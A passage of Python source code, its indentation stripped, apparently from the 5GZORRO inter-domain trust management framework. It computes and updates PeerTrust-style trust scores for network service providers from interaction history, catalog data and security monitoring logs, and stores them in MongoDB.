global satisfaction
global credibility
global TF
global CF
global offer_type
global considered_offer_list
global availableAssets
global totalAssets
global availableAssetLocation
global totalAssetLocation
global consideredOffers
global totalOffers
global consideredOfferLocation
global totalOfferLocation
global statistic_catalog
FORGETTING_FACTOR = 0.2
""" Retrieve parameters from post request"""
req = request.data.decode("utf-8")
parameter = json.loads(req)
for i in parameter:
print("$$$$$$$$$$$$$$ Starting trust computation procces on ",i['trusteeDID'], " $$$$$$$$$$$$$$\n")
start_time = time.time()
current_trustee = i['trusteeDID']
trustorDID = i['trustorDID']
offerDID = i['offerDID']
""" Recovering the last trust information """
last_trustee_interaction_registered = i['lastValue']['totalInteractionNumber']
last_satisfaction = i['lastValue']['trusteeSatisfaction']
last_credibility = i['lastValue']['credibility']
last_transaction_factor = i['lastValue']['transactionFactor']
last_community_factor = i['lastValue']['communityFactor']
last_interaction_number = i['lastValue']['interaction_number']
last_trust_value = i['lastValue']['trust_value']
last_trustor_satisfaction = i['lastValue']['userSatisfaction']
response = {"trustorDID": trustorDID, "trusteeDID": {"trusteeDID": current_trustee, "offerDID": offerDID}, "trust_value": i['lastValue']["trust_value"], "evaluation_criteria": "Inter-domain", "initEvaluationPeriod": i['lastValue']["initEvaluationPeriod"],"endEvaluationPeriod": i['lastValue']["endEvaluationPeriod"]}
""" Retrieving new trustee's interactions """
print("Checking if "+current_trustee+" has had new interactions from last time we interacted with it\n")
print("The last time "+trustorDID+" interacted with "+current_trustee+", it had had "+str(last_trustee_interaction_registered)+" interactions in total\n")
current_trustee_interactions = i['trusteeInteractions']
new_satisfaction = 0.0
new_credibility = 0.0
new_transaction_factor = 0.0
new_community_factor = 0.0
counter_new_interactions = 0
counter_new_CF_interactions = 0
"""Obtaining the last interaction registered by the Trustee in the DLT """
if len(current_trustee_interactions) > 0:
last_interaction_DLT = current_trustee_interactions[len(current_trustee_interactions)-1]
print("Currently, "+current_trustee+" has "+str(last_interaction_DLT['currentInteractionNumber'])+" interactions in total\n")
if int(last_interaction_DLT['currentInteractionNumber']) > last_trustee_interaction_registered:
print(int(last_interaction_DLT['currentInteractionNumber'])-last_trustee_interaction_registered, " new interactions should be contemplated to compute the new trust score on "+current_trustee+"\n")
print("%%%%%%%%%%%%%% Principal PeerTrust equation %%%%%%%%%%%%%%\n")
print("\tT(u) = α * ((∑ S(u,i) * Cr(p(u,i) * TF(u,i)) / I(u)) + β * CF(u)\n")
for new_interaction in current_trustee_interactions:
new_trustee_interaction = consumer.readLastTrustValues(peerTrust.historical, current_trustee, new_interaction['trusteeDID'], last_trustee_interaction_registered, new_interaction['currentInteractionNumber'])
if not bool(new_trustee_interaction):
new_interaction["last_trustee_interaction_registered"] = last_trustee_interaction_registered
endpoint = new_interaction["endpoint"].split("/")[2]
response = requests.post("http://"+endpoint+"/query_trust_info", data=json.dumps(new_interaction).encode("utf-8"))
if response.status_code == 200:
response = json.loads(response.text)
else:
print("Error:", response)
for interaction in response:
if bool(interaction):
peerTrust.historical.append(interaction)
for i in new_trustee_interaction:
print(new_interaction['trustorDID']," had an interaction with ", new_interaction['trusteeDID'],"\n")
print("\tS(u,i) ---> ", i["trustee"]["trusteeSatisfaction"])
new_satisfaction = new_satisfaction + i["trustee"]["trusteeSatisfaction"]
start_credibility = time.time()
current_credibility = peerTrust.credibility(current_trustee, new_interaction['trusteeDID'])
print("\tCr(p(u,i)) ---> ", round(current_credibility, 4))
new_credibility = new_credibility + current_credibility
credibility = credibility + (time.time()-start_credibility)
start_TF = time.time()
current_transaction_factor = peerTrust.transactionContextFactor(current_trustee, new_interaction['trusteeDID'], new_interaction['offerDID'])
print("\tTF(u,i) ---> ", current_transaction_factor)
new_transaction_factor = new_transaction_factor + current_transaction_factor
TF = TF + (time.time()-start_TF)
start_CF = time.time()
#current_community_factor = peerTrust.communityContextFactor2(current_trustee, new_interaction['trusteeDID'])
current_community_factor = peerTrust.bad_mouthing_attack_resilience(trustorDID, current_trustee, new_interaction['trusteeDID'], new_interaction['offerDID'])
print("\tCF(u) ---> ", current_community_factor, "\n")
new_community_factor = new_community_factor + current_community_factor
CF = CF + (time.time()-start_CF)
if current_community_factor > 0:
"It could be the case we don't have recommender for a new PO"
counter_new_CF_interactions += 1
counter_new_interactions +=1
else:
print("Currently, "+current_trustee+" has "+str(len(current_trustee_interactions))+" interactions in total\n")
"Only updates and applies forgetting factor whether there are new Trustee interactions"
if counter_new_interactions > 0:
""" Updating the last value with the summation of new interactions"""
new_satisfaction = round(self.recomputingTrustValue(last_satisfaction, (new_satisfaction/counter_new_interactions), FORGETTING_FACTOR), 4)
new_credibility = round(self.recomputingTrustValue(last_credibility, (new_credibility/counter_new_interactions), FORGETTING_FACTOR), 4)
new_transaction_factor = round(self.recomputingTrustValue(last_transaction_factor, (new_transaction_factor/counter_new_interactions), FORGETTING_FACTOR), 4)
else:
new_satisfaction = last_satisfaction
new_credibility = last_credibility
new_transaction_factor = last_transaction_factor
if counter_new_CF_interactions > 0:
new_community_factor = round(self.recomputingTrustValue(last_community_factor, (new_community_factor/counter_new_interactions), FORGETTING_FACTOR), 4)
else:
new_community_factor = last_community_factor
information = trustInformationTemplate.trustTemplate()
information["trustee"]["trusteeDID"] = current_trustee
information["trustee"]["offerDID"] = offerDID
information["trustee"]["trusteeSatisfaction"] = round(new_satisfaction, 4)
information["trustor"]["trustorDID"] = trustorDID
information["trustor"]["trusteeDID"] = current_trustee
information["trustor"]["offerDID"] = offerDID
information["trustor"]["credibility"] = round(new_credibility, 4)
information["trustor"]["transactionFactor"] = round(new_transaction_factor, 4)
information["trustor"]["communityFactor"] = round(new_community_factor, 4)
"If we don't have recommendations, we only rely on ourself"
if new_community_factor > 0:
direct_weighting = round(random.uniform(0.65, 0.7),2)
else:
direct_weighting = 1
information["trustor"]["direct_parameters"]["direct_weighting"] = direct_weighting
information["trustor"]["indirect_parameters"]["recommendation_weighting"] = round(1-direct_weighting, 4)
#information["trustor"]["direct_parameters"]["interactionNumber"] = last_interaction_number+1
information["trustor"]["direct_parameters"]["interactionNumber"] = peerTrust.getInteractionNumber(trustorDID, current_trustee, offerDID)
#print(peerTrust.getLastTotalInteractionNumber(current_trustee))
information["trustor"]["direct_parameters"]["totalInteractionNumber"] = peerTrust.getLastTotalInteractionNumber(current_trustee)
#information["trustor"]["direct_parameters"]["totalInteractionNumber"] = last_interaction_DLT['currentInteractionNumber']
information["trustor"]["direct_parameters"]["feedbackNumber"] = peerTrust.getTrusteeFeedbackNumberDLT(current_trustee)
information["trustor"]["direct_parameters"]["feedbackOfferNumber"] = peerTrust.getOfferFeedbackNumberDLT(current_trustee, offerDID)
information["trust_value"] = round(direct_weighting*(new_satisfaction*new_credibility*new_transaction_factor)+(1-direct_weighting)*new_community_factor,4)
information["currentInteractionNumber"] = peerTrust.getCurrentInteractionNumber(trustorDID)
information["initEvaluationPeriod"] = datetime.timestamp(datetime.now())-1000
information["endEvaluationPeriod"] = datetime.timestamp(datetime.now())
""" These values should be requested from other 5GZORRO components in future releases, in particular,
from the Calatog and SLA Breach Predictor"""
start_satisfaction = time.time()
availableAssets = 0
totalAssets = 0
availableAssetLocation = 0
totalAssetLocation = 0
consideredOffers = 0
totalOffers= 0
consideredOfferLocation = 0
totalOfferLocation = 0
"5GBarcelona"
load_dotenv()
barcelona_address = os.getenv('5GBARCELONA_CATALOG_A')
response = requests.get(barcelona_address+"productCatalogManagement/v4/productOffering/did/"+offerDID)
"5TONIC"
#madrid_address = os.getenv('5TONIC_CATALOG_A')
#response = requests.get(madrid_address+"productCatalogManagement/v4/productOffering/did/")
response = json.loads(response.text)
place = response['place'][0]['href']
response = requests.get(place)
response = json.loads(response.text)
city = response['city']
country = response['country']
locality = response['locality']
x_coordinate = response['geographicLocation']['geometry'][0]['x']
y_coordinate = response['geographicLocation']['geometry'][0]['y']
z_coordinate = response['geographicLocation']['geometry'][0]['z']
for product_offer in statistic_catalog:
if product_offer['provider'] == current_trustee:
totalAssets = product_offer['n_resource']
location = x_coordinate+"_"+y_coordinate+"_"+z_coordinate
if location in product_offer:
"Updating global variables"
totalAssetLocation = product_offer[location]
availableAssets = product_offer['active']
availableAssetLocation = product_offer['active'+"_"+location]
totalOffers = product_offer['active'+"_"+offer_type[offerDID].lower()]
totalOfferLocation = product_offer['active'+"_"+offer_type[offerDID].lower()+"_"+location]
break
"""Calculate the statistical parameters with respect to the considered offers"""
for offer in considered_offer_list:
if offer['trusteeDID'] == current_trustee:
consideredOffers+=1
"5GBarcelona"
load_dotenv()
barcelona_address = os.getenv('5GBARCELONA_CATALOG_A')
response = requests.get(barcelona_address+"productCatalogManagement/v4/productOffering/did/"+offer['offerDID'])
#madrid_address = os.getenv('5TONIC_CATALOG_A')
#response = requests.get(madrid_address+"productCatalogManagement/v4/productOffering/did/"+offer['offerDID'])
response = json.loads(response.text)
current_offer_place = response['place'][0]['href']
response = requests.get(current_offer_place)
response = json.loads(response.text)
"Check whether the POs have location information"
if "city" and "country" and "locality" in response:
current_offer_city = response['city']
current_offer_country = response['country']
current_offer_locality = response['locality']
current_offer_x_coordinate = response['geographicLocation']['geometry'][0]['x']
current_offer_y_coordinate = response['geographicLocation']['geometry'][0]['y']
current_offer_z_coordinate = response['geographicLocation']['geometry'][0]['z']
if city == current_offer_city and country == current_offer_country and locality == \
current_offer_locality and x_coordinate == current_offer_x_coordinate and \
y_coordinate == current_offer_y_coordinate and z_coordinate == current_offer_z_coordinate:
consideredOfferLocation+=1
"These parameter should be collected from SLA Breach Predictor in the future"
managedViolations = random.randint(1,20)
predictedViolations = managedViolations + random.randint(0,5)
executedViolations = random.randint(0,6)
nonPredictedViolations = random.randint(0,2)
managedOfferViolations = random.randint(4,22)
predictedOfferViolations = managedOfferViolations + random.randint(0,8)
executedOfferViolations = random.randint(0,4)
nonPredictedOfferViolations = random.randint(0,3)
provider_reputation = peerTrust.providerReputation(availableAssets, totalAssets,availableAssetLocation,
totalAssetLocation,managedViolations, predictedViolations,
executedViolations, nonPredictedViolations)
information["trustor"]["direct_parameters"]["availableAssets"] = availableAssets
information["trustor"]["direct_parameters"]["totalAssets"] = totalAssets
information["trustor"]["direct_parameters"]["availableAssetLocation"] = availableAssetLocation
information["trustor"]["direct_parameters"]["totalAssetLocation"] = totalAssetLocation
information["trustor"]["direct_parameters"]["managedViolations"] = managedViolations
information["trustor"]["direct_parameters"]["predictedViolations"] = predictedOfferViolations
information["trustor"]["direct_parameters"]["executedViolations"] = executedViolations
information["trustor"]["direct_parameters"]["nonPredictedViolations"] = nonPredictedViolations
offer_reputation = peerTrust.offerReputation(consideredOffers, totalOffers, consideredOfferLocation,
totalOfferLocation, managedOfferViolations,
predictedOfferViolations, executedOfferViolations,
nonPredictedOfferViolations)
information["trustor"]["direct_parameters"]["consideredOffers"] = consideredOffers
information["trustor"]["direct_parameters"]["totalOffers"] = totalOffers
information["trustor"]["direct_parameters"]["consideredOfferLocation"] = consideredOfferLocation
information["trustor"]["direct_parameters"]["totalOfferLocation"] = totalOfferLocation
information["trustor"]["direct_parameters"]["managedOfferViolations"] = managedOfferViolations
information["trustor"]["direct_parameters"]["predictedOfferViolations"] = predictedOfferViolations
information["trustor"]["direct_parameters"]["executedOfferViolations"] = executedOfferViolations
information["trustor"]["direct_parameters"]["nonPredictedOfferViolations"] = nonPredictedOfferViolations
satisfaction = satisfaction + (time.time()-start_satisfaction)
start_satisfaction = time.time()
provider_satisfaction = peerTrust.providerSatisfaction(trustorDID, current_trustee, provider_reputation, consumer)
offer_satisfaction = peerTrust.offerSatisfaction(trustorDID, current_trustee, offerDID, offer_reputation)
information["trustor"]["direct_parameters"]["providerSatisfaction"] = round(provider_satisfaction, 4)
ps_weighting = round(random.uniform(0.4, 0.6),2)
information["trustor"]["direct_parameters"]["PSWeighting"] = ps_weighting
information["trustor"]["direct_parameters"]["offerSatisfaction"] = round(offer_satisfaction, 4)
os_weighting = 1-ps_weighting
information["trustor"]["direct_parameters"]["OSWeighting"] = os_weighting
information["trustor"]["direct_parameters"]["providerReputation"] = round(provider_reputation, 4)
information["trustor"]["direct_parameters"]["offerReputation"] = round(offer_reputation, 4)
new_trustor_satisfaction = round(peerTrust.satisfaction(ps_weighting, os_weighting, provider_satisfaction, offer_satisfaction), 4)
information["trustor"]["direct_parameters"]["userSatisfaction"] = round(self.recomputingTrustValue(last_trustor_satisfaction, new_trustor_satisfaction, FORGETTING_FACTOR), 4)
new_trustor_satisfaction = information["trustor"]["direct_parameters"]["userSatisfaction"]
satisfaction = satisfaction + (time.time()-start_satisfaction)
"""Updating the recommendation trust"""
recommendation_list = consumer.readAllRecommenders(peerTrust.historical, trustorDID, current_trustee)
new_recommendation_list = []
for recommendation in recommendation_list:
satisfaction_variance= last_trustor_satisfaction - new_trustor_satisfaction
new_recommendation_trust = self.recomputingRecommendationTrust(satisfaction_variance, recommendation)
recommendation["recommendation_trust"] = new_recommendation_trust
new_recommendation_list.append(recommendation)
if bool(new_recommendation_list):
information["trustor"]["indirect_parameters"]["recommendations"] = new_recommendation_list
response = {"trustorDID": trustorDID, "trusteeDID": {"trusteeDID": current_trustee, "offerDID": offerDID}, "trust_value": information["trust_value"], "currentInteractionNumber": information["currentInteractionNumber"],"evaluation_criteria": "Inter-domain", "initEvaluationPeriod": information["initEvaluationPeriod"],"endEvaluationPeriod": information["endEvaluationPeriod"]}
print("\nNew Trust values after considering new interactions of "+current_trustee+":")
print("\tα ---> ", direct_weighting)
print("\tS(u,i) ---> ", new_satisfaction)
print("\tCr(p(u,i)) ---> ", new_credibility)
print("\tTF(u,i) ---> ", new_transaction_factor)
print("\tβ ---> ", round(1-direct_weighting, 3))
print("\tCF(u) ---> ", new_community_factor)
print("\nPrevious Trust score of "+trustorDID+" on "+current_trustee+" --->", last_trust_value, " -- New trust score --->", information["trust_value"])
#print("$$$$$ Historical: \n", peerTrust.historical)
#last_trust_value = consumer.readLastTrustValueOffer(peerTrust.historical, trustorDID, current_trustee, offerDID)
#print("$$$$$ Last Value: ", last_trust_value)
peerTrust.historical.append(information)
#if information in peerTrust.historical:
#print("Guardado: \n", information['trustor']['direct_parameters']['totalInteractionNumber'], time.time())
#print("$$$$$ Historical after: \n", peerTrust.historical)
compute_time = compute_time + (time.time()-start_time)
###print("Compute time:", compute_time)
print("\n$$$$$$$$$$$$$$ Ending trust computation procces on ",current_trustee, " $$$$$$$$$$$$$$\n")
requests.post("http://localhost:5002/store_trust_level", data=json.dumps(information).encode("utf-8"))
return response
def recomputingRecommendationTrust(self, satisfaction_variance, recommendation_object):
""" This method updates the recommendation trust (RT) value after new interactions between a trustor and a trustee.
The method makes use of the satisfaction and recommendation variances to increase or decrease the RT."""
mean_variance = recommendation_object["average_recommendations"] - recommendation_object["last_recommendation"]
if satisfaction_variance > 0 and mean_variance > 0:
new_recommendation_trust = (1 + satisfaction_variance)*(mean_variance/10) + recommendation_object["recommendation_trust"]
if new_recommendation_trust > 1.0:
new_recommendation_trust = 1.0
return new_recommendation_trust
elif satisfaction_variance < 0 and mean_variance < 0:
new_recommendation_trust = (1 + abs(satisfaction_variance))*(abs(mean_variance)/10) + recommendation_object["recommendation_trust"]
if new_recommendation_trust > 1.0:
new_recommendation_trust = 1.0
return new_recommendation_trust
elif satisfaction_variance < 0 and mean_variance > 0:
new_recommendation_trust = recommendation_object["recommendation_trust"] - (1 - satisfaction_variance)*(mean_variance/10)
if new_recommendation_trust < 0:
new_recommendation_trust = 0
return new_recommendation_trust
elif satisfaction_variance > 0 and mean_variance < 0:
new_recommendation_trust = recommendation_object["recommendation_trust"] - (1 + satisfaction_variance)*(abs(mean_variance)/10)
if new_recommendation_trust < 0:
new_recommendation_trust = 0
return new_recommendation_trust
elif mean_variance == 0:
return recommendation_object["recommendation_trust"]
def recomputingTrustValue(self, historical_value, new_value, forgetting_factor):
""" This method applies a sliding window to compute a new trust score. Besides, we avoid new values can
immediately change an historical value through the forgetting factor """
return (1-forgetting_factor) * historical_value + forgetting_factor * new_value
class store_trust_level(Resource):
def post(self):
""" This method is employed to register direct trust in our internal database """
global storage_time
req = request.data.decode("utf-8")
information = json.loads(req)
print("$$$$$$$$$$$$$$ Starting trust information storage process $$$$$$$$$$$$$$\n")
start_time = time.time()
print("Registering a new trust interaction between two domains in the DLT\n")
data = "{\"trustorDID\": \""+information["trustor"]["trustorDID"]+"\", \"trusteeDID\": \""+information["trustee"]["trusteeDID"]+"\", \"offerDID\": \""+information["trustee"]["offerDID"]+"\",\"userSatisfaction\": "+str(information["trustor"]["direct_parameters"]["userSatisfaction"])+", \"interactionNumber\": "+str(information["trustor"]["direct_parameters"]["interactionNumber"])+", \"totalInteractionNumber\": "+str(information["trustor"]["direct_parameters"]["totalInteractionNumber"])+", \"currentInteractionNumber\": "+str(information["currentInteractionNumber"])+"}\""
print(data,"\n")
print("Sending new trust information in the historical generated by the Trust Management Framework \n")
print(information)
print("\nStoring new trust information in our internal MongoDB database\n")
print("\n$$$$$$$$$$$$$$ Ending trust information storage process $$$$$$$$$$$$$$\n")
"""list_trustee_interactions = {}
query = mongoDB.find_one(information["trustee"]["trusteeDID"])
if query is not None:
list_trustee_interactions[information["trustee"]["trusteeDID"]].append(information)
mongoDB.update_one(query, list_trustee_interactions)
else:
list_trustee_interactions[information["trustee"]["trusteeDID"]] = [information]
mongoDB.insert_one(list_trustee_interactions)"""
mongoDB.insert_one(information)
#pprint.pprint(mongoDB.find_one({"trustorDID": trustorDID}))
#mongoDB.insert_many([tutorial2, tutorial1])
#for doc in mongoDB.find():
#pprint.pprint(doc)
storage_time = storage_time + (time.time()-start_time)
###print("Storage time:", storage_time)
return 200
class update_trust_level(Resource):
def post(self):
""" This method updates a trust score based on certain SLA events. More events need to be considered,
it is only an initial version"""
global offer_type
req = request.data.decode("utf-8")
information = json.loads(req)
print("\n$$$$$$$$$$$$$$ Starting update trust level process on", information["offerDID"], "$$$$$$$$$$$$$$\n")
#slaBreachPredictor_topic = information["SLABreachPredictor"]
#trustorDID = information["trustor"]["trustorDID"]
#trusteeDID = information["trustor"]["trusteeDID"]
#offerDID = information["trustor"]["offerDID"]
offerDID = information["offerDID"]
" Equation for calculating new trust --> n_ts = n_ts+o_ts*((1-n_ts)/10) from security events"
last_trust_score = consumer.readAllInformationTrustValue(peerTrust.historical, offerDID)
""" Defining a new thread per each trust relationship as well as an event to stop the relationship"""
event = threading.Event()
x = threading.Thread(target=self.reward_and_punishment_based_on_security, args=(last_trust_score, offer_type, event,))
threads.append({offerDID:x, "stop_event": event})
x.start()
#notifications = consumer.readSLANotification(peerTrust.historical, slaBreachPredictor_topic, trustorDID, trusteeDID, offerDID)
#positive_notification = "was able to manage the SLA violation successfully"
#negative_notification = "was not able to manage the SLA violation successfully"
#first_range_probability = 0.25
#second_range_probability = 0.50
#third_range_probability = 0.75
#fourth_range_probability = 1.0
#new_trust_score = 0.0
#for notification in notifications:
#print("Notification received from the SLA Breach Predictor about", notification["breachPredictionNotification"],":\n")
#current_notification = notification["notification"]
#print("\t-", current_notification,"\n")
#likehood = notification["breachPredictionNotification"]["value"]
#last_trust_score = consumer.readAllInformationTrustValue(peerTrust.historical, trustorDID, trusteeDID, offerDID)
#if positive_notification in current_notification:
#if likehood <= first_range_probability:
#new_trust_score = last_trust_score["trust_value"] + last_trust_score["trust_value"]*0.075
#elif likehood <= second_range_probability:
#new_trust_score = last_trust_score["trust_value"] + last_trust_score["trust_value"]*0.10
#elif likehood <= third_range_probability:
#new_trust_score = last_trust_score["trust_value"] + last_trust_score["trust_value"]*0.125
#elif likehood <= fourth_range_probability:
#new_trust_score = last_trust_score["trust_value"] + last_trust_score["trust_value"]*0.15
#elif negative_notification in current_notification:
#if likehood <= first_range_probability:
#new_trust_score = last_trust_score["trust_value"] - last_trust_score["trust_value"]*0.10
#elif likehood <= second_range_probability:
#new_trust_score = last_trust_score["trust_value"] - last_trust_score["trust_value"]*0.125
#elif likehood <= third_range_probability:
#new_trust_score = last_trust_score["trust_value"] - last_trust_score["trust_value"]*0.15
#elif likehood <= fourth_range_probability:
#new_trust_score = last_trust_score["trust_value"] - last_trust_score["trust_value"]*0.175
#if new_trust_score > 1.0:
#new_trust_score = 1.0
#elif new_trust_score < 0.0:
#new_trust_score = 0.0
#print("\t\tPrevious Trust Score", last_trust_score ["trust_value"], " --- Updated Trust Score --->", round(new_trust_score, 3), "\n")
#last_trust_score["trust_value"] = round(new_trust_score, 3)
#last_trust_score["endEvaluationPeriod"] = datetime.timestamp(datetime.now())
#peerTrust.historical.append(last_trust_score)
#mongoDB.insert_one(last_trust_score)
#print("\n$$$$$$$$$$$$$$ Ending update trust level process $$$$$$$$$$$$$$\n")
return 200
def reward_and_punishment_based_on_security(self, last_trust_score, offer_type, event):
"""" This method is in charge of updating an ongoing trust relationship after each 30 minutes employing security
monitoring events reported by the Security Analysis Service"""
"Sliding window weighting with respect to the forgetting factor"
TOTAL_RW = 0.9
NOW_RW = 1 - TOTAL_RW
"Sliding window definition IN SECONDS"
CURRENT_TIME_WINDOW = 1800
total_reward_and_punishment = float(last_trust_score["trustor"]["reward_and_punishment"])
offerDID = last_trust_score["trustor"]["offerDID"]
current_offer_type = offer_type[offerDID]
while not event.isSet():
time.sleep(CURRENT_TIME_WINDOW)
current_reward_and_punishment = 0.0
if current_offer_type.lower() == 'ran' or current_offer_type.lower() == 'spectrum':
current_reward_and_punishment = self.generic_reward_and_punishment_based_on_security(CURRENT_TIME_WINDOW, offerDID, current_offer_type, 0.4, 0.1, 0.1, 0.4)
elif current_offer_type.lower() == 'edge' or current_offer_type.lower() == 'cloud':
current_reward_and_punishment = self.generic_reward_and_punishment_based_on_security(CURRENT_TIME_WINDOW, offerDID, current_offer_type, 0.2, 0.35, 0.25, 0.2)
elif current_offer_type.lower() == 'vnf' or current_offer_type.lower() == 'cnf':
current_reward_and_punishment = self.generic_reward_and_punishment_based_on_security(CURRENT_TIME_WINDOW, offerDID, current_offer_type, 0.233, 0.3, 0.233, 0.233)
elif current_offer_type.lower() == 'network service' or current_offer_type.lower() == 'slice':
"We deal in particular with offers of the network service/slice type"
resource_specification_list = self.get_resource_list_network_service_offer(offerDID)
for resource in resource_specification_list:
resource_specification = resource['href']
response = requests.get(resource_specification)
response = json.loads(response.text)
type = response['resourceSpecCharacteristic'][0]['name']
if 'ran' in type.lower():
current_offer_type = 'ran'
current_reward_and_punishment = current_reward_and_punishment + self.generic_reward_and_punishment_based_on_security(CURRENT_TIME_WINDOW, offerDID, current_offer_type, 0.4, 0.1, 0.1, 0.4)
elif 'spectrum' in type.lower():
current_offer_type = 'spectrum'
current_reward_and_punishment = current_reward_and_punishment + self.generic_reward_and_punishment_based_on_security(CURRENT_TIME_WINDOW, offerDID, current_offer_type, 0.4, 0.1, 0.1, 0.4)
elif 'edge' in type.lower():
current_offer_type = 'edge'
current_reward_and_punishment = current_reward_and_punishment + self.generic_reward_and_punishment_based_on_security(CURRENT_TIME_WINDOW, offerDID, current_offer_type, 0.2, 0.35, 0.25, 0.2)
elif 'cloud' in type.lower():
current_offer_type = 'cloud'
current_reward_and_punishment = current_reward_and_punishment + self.generic_reward_and_punishment_based_on_security(CURRENT_TIME_WINDOW, offerDID, current_offer_type, 0.2, 0.35, 0.25, 0.2)
elif 'vnf' in type.lower():
current_offer_type = 'vnf'
current_reward_and_punishment = current_reward_and_punishment + self.generic_reward_and_punishment_based_on_security(CURRENT_TIME_WINDOW, offerDID, current_offer_type, 0.233, 0.3, 0.233, 0.233)
elif 'cnf' in type.lower():
current_offer_type = 'cnf'
current_reward_and_punishment = current_reward_and_punishment + self.generic_reward_and_punishment_based_on_security(CURRENT_TIME_WINDOW, offerDID, current_offer_type, 0.233, 0.3, 0.233, 0.233)
current_reward_and_punishment = current_reward_and_punishment / len(resource_specification_list)
if current_reward_and_punishment >= 0:
final_security_reward_and_punishment = TOTAL_RW * total_reward_and_punishment + NOW_RW * current_reward_and_punishment
if final_security_reward_and_punishment >= 0.5:
reward_and_punishment = final_security_reward_and_punishment - 0.5
n_ts = float(last_trust_score ["trust_value"]) + reward_and_punishment * ((1-float(last_trust_score ["trust_value"]))/10)
new_trust_score = min(n_ts, 1)
elif final_security_reward_and_punishment < 0.5:
"The lower value the higher punishment"
reward_and_punishment = 0.5 - final_security_reward_and_punishment
n_ts = float(last_trust_score ["trust_value"]) - reward_and_punishment * ((1-float(last_trust_score ["trust_value"]))/10)
new_trust_score = max(0, n_ts)
else:
new_trust_score = last_trust_score ["trust_value"]
final_security_reward_and_punishment = total_reward_and_punishment
print("No new Security Analysis events have been generated in the last time-window")
print("\n\tPrevious Trust Score", last_trust_score ["trust_value"], " --- Updated Trust Score After Reward and Punishment --->", round(new_trust_score, 4), "\n")
last_trust_score["trustor"]["reward_and_punishment"] = final_security_reward_and_punishment
last_trust_score["trust_value"] = round(new_trust_score, 4)
last_trust_score["endEvaluationPeriod"] = datetime.timestamp(datetime.now())
peerTrust.historical.append(last_trust_score)
#mongoDB.insert_one(last_trust_score)
#itm = db.doctors.find_one({"email":doc_mail})
itm = mongoDB.find_one({'trustee.offerDID': offerDID, 'trustor.trusteeDID': last_trust_score["trustor"]["trusteeDID"]})
if itm != None:
mongoDB.replace_one({'_id': itm.get('_id')}, last_trust_score, True)
def get_resource_list_network_service_offer(self, offerDID):
""" This method retrieves one or more resources involved in a Network Service/Slice Product Offering"""
"5GBarcelona"
load_dotenv()
barcelona_address = os.getenv('5GBARCELONA_CATALOG_A')
response = requests.get(barcelona_address+"productCatalogManagement/v4/productOffering/did/"+offerDID)
"5TONIC"
#madrid_address = os.getenv('5TONIC_CATALOG_A')
#response = requests.get(madrid_address+"productCatalogManagement/v4/productOffering/did/")
response = json.loads(response.text)
product_specification = response['productSpecification']['href']
response = requests.get(product_specification)
response = json.loads(response.text)
service_specification = response['serviceSpecification'][0]['href']
response = requests.get(service_specification)
response = json.loads(response.text)
resource_specification = response['resourceSpecification']
return resource_specification
def generic_reward_and_punishment_based_on_security(self, CURRENT_TIME_WINDOW, offerDID, offer_type, CONN_DIMENSION_WEIGHTING,
NOTICE_DIMENSION_WEIGHTING, WEIRD_DIMENSION_WEIGHTING,
STATS_DIMENSION_WEIGHTING):
""" This methods collects from ElasticSearch new security effects and computes the reward or punishment based on
the type of offers. So, different sets of events are linked to each PO as well as weighting factors """
"Global variable definition"
global icmp_orig_pkts
global tcp_orig_pkts
global udp_orig_pkts
"Local variable definition"
conn_info = []
notice_info = []
weird_info = []
stats_info = []
first_conn_value = 0
first_notice_value = 0
first_weird_value = 0
first_stats_value = 0
indices_info = self.get_ELK_information(offerDID)
if len(indices_info) == 0:
print('No matches were detected by the ', offerDID, 'index in the Security Analysis Service logs')
for index in indices_info:
for hit in index["hits"]["hits"]:
if "conn.log" in hit["_source"]["log"]["file"]["path"] and hit not in conn_info:
conn_info.append(hit)
elif "notice.log" in hit["_source"]["log"]["file"]["path"] and hit not in notice_info:
notice_info.append(hit)
elif "weird.log" in hit["_source"]["log"]["file"]["path"] and hit not in weird_info:
weird_info.append(hit)
elif "stats.log" in hit["_source"]["log"]["file"]["path"] and hit not in stats_info:
stats_info.append(hit)
"Now, we can have multiple VMs linked to the same slices"
#first_conn_value = (first_conn_value + self.conn_log(CURRENT_TIME_WINDOW, conn_info))/len(indices_info)
#first_notice_value = (first_notice_value + self.notice_log(CURRENT_TIME_WINDOW, offer_type, notice_info))/len(indices_info)
#first_weird_value = (first_weird_value + self.weird_log(CURRENT_TIME_WINDOW, offer_type, weird_info))/len(indices_info)
#first_stats_value = (first_stats_value + self.stats_log(CURRENT_TIME_WINDOW, icmp_orig_pkts, tcp_orig_pkts, udp_orig_pkts, stats_info))/len(indices_info)
"After option 1 will be developed, we will only need to compute 1 value per dimension"
if len(indices_info) > 0:
first_conn_value = self.conn_log(CURRENT_TIME_WINDOW, conn_info)
first_notice_value = self.notice_log(CURRENT_TIME_WINDOW, offer_type, notice_info)
first_weird_value = self.weird_log(CURRENT_TIME_WINDOW, offer_type, weird_info)
first_stats_value = self.stats_log(CURRENT_TIME_WINDOW, icmp_orig_pkts, tcp_orig_pkts, udp_orig_pkts, stats_info)
if first_conn_value and first_stats_value and first_weird_value and first_notice_value == 0:
"We don't have new SAS events in the current time-window"
return -1
return CONN_DIMENSION_WEIGHTING * first_conn_value + NOTICE_DIMENSION_WEIGHTING * first_notice_value \
+ WEIRD_DIMENSION_WEIGHTING * first_weird_value + STATS_DIMENSION_WEIGHTING * first_stats_value
else:
"In this case, the PO does not have a Service Specification and in consequence the SAS cannot generate an index"
return -1
def get_ELK_information(self, offerDID):
""" This method gets all new index from the ELK"""
load_dotenv()
elk_address = os.getenv('ELK')
response = requests.post(elk_address+'_cat/indices')
response = response.text
with open('output.txt', 'w') as my_data_file:
my_data_file.write(response)
my_data_file.close()
instances = []
indices_info = []
load_dotenv()
barcelona_address = os.getenv('5GBARCELONA_CATALOG_A')
response = requests.get(barcelona_address+"productCatalogManagement/v4/productOffering/did/"+offerDID)
"5TONIC"
#madrid_address = os.getenv('5TONIC_CATALOG_A')
#response = requests.get(madrid_address+"productCatalogManagement/v4/productOffering/did/")
response = json.loads(response.text)
product_specification = response['productSpecification']['href']
response = requests.get(product_specification)
response = json.loads(response.text)
if len(response['serviceSpecification']) > 0:
id_service_specification = response['serviceSpecification'][0]['id']
else:
id_service_specification = 'None'
print('The POs does not contain the serviceSpecification field')
with open('output.txt', 'r') as f:
for line in f:
if 'yellow' in line:
indice = line.split('open ')[1].split(" ")[0]
if id_service_specification in indice:
instances.append(indice)
for instance in instances:
response = requests.post(elk_address+instance+'/_search')
response = json.loads(response.text)
indices_info.append(response)
return indices_info
def conn_log(self, time_window, conn_info):
""" This function will compute the security level of an ongoing trust relationship between two operators from the
